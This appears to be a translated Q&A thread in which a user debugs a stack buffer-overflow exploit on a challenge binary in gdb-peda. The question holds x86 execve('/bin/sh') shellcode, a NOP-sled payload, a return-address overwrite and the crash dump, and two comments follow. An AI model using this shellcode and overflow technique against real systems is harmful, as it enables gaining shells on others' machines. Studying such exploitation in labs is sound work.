我在使用gdb-peda在kali linux上處理挑戰和利用可執行文件時遇到了一個奇怪的問題。如何修復GDB可能的字符集問題NOP 0x90在內存中轉換爲0x90c2?
#>gdb -q someVulnerableBinary
gdb-peda$ python
>shellcode=(
>"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
>)
>end
gdb-peda$ pset arg '"\x90"*(76-len(shellcode)) + shellcode + "\x08\x04\xb4\x10"[::-1] + "C"*10'
gdb-peda$ r
Starting program: /home/theDude/Downloads/tmp/someVulnerableBinary 'j
XRh//shh/binã1ÉÍ°CCCCCCCCCC'
j
XRh//shh/binã1ÉÍ°CCCCCCCCCC
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x804b410 --> 0x90c290c2
EBX: 0x0
ECX: 0x0
EDX: 0x99
ESI: 0x2
EDI: 0xf7faf000 --> 0x1b2db0
EBP: 0x90c290c2
ESP: 0xffffda00 --> 0x90c290c2
EIP: 0x90c290c2
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x90c290c2
[------------------------------------stack-------------------------------------]
0000| 0xffffda00 --> 0x90c290c2
0004| 0xffffda04 --> 0x90c290c2
0008| 0xffffda08 --> 0x90c290c2
0012| 0xffffda0c --> 0x90c290c2
0016| 0xffffda10 --> 0x90c290c2
0020| 0xffffda14 --> 0x90c290c2
0024| 0xffffda18 --> 0x90c290c2
0028| 0xffffda1c --> 0xb6a90c2
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x90c290c2 in ??()
gdb-peda$
gdb-peda$ i r $eax
eax 0x804b410 0x804b410
gdb-peda$ x/20x $eax
0x804b410: 0x90c290c2 0x90c290c2 0x90c290c2 0x90c290c2
0x804b420: 0x90c290c2 0x90c290c2 0x90c290c2 0x90c290c2
0x804b430: 0x90c290c2 0x90c290c2 0x90c290c2 0x90c290c2
0x804b440: 0x90c290c2 0x90c290c2 0x90c290c2 0x90c290c2
0x804b450: 0x90c290c2 0x90c290c2 0x90c290c2 0x90c290c2
gdb-peda$ show charset
The host character set is "auto; currently UTF-8".
The target character set is "auto; currently UTF-8".
The target wide character set is "auto; currently UTF-32".
告訴我,如果你需要了解它的更多信息,但顯然從NOP \ X90在內存中的翻譯作出\ x90c2在內存中。我無法弄清楚爲什麼或者即使它是字符集,以及目前如何改變它。除此之外,我現在無法通過谷歌或計算器找到類似的東西。
我感謝您的幫助,我已經感謝您的建議和幫助。
這是不清楚的 - 目前的問題似乎是你的程序計數器中有'0x90c290c2'(大概是因爲你覆蓋了棧上的返回地址)。我不確定這與誤解NOP操作碼有很大關係。 –
開始獲取%pc == 0x41424344然後擔心shellcode。如上所述,你有問題得到程序計數器控制,這是第1步 – adam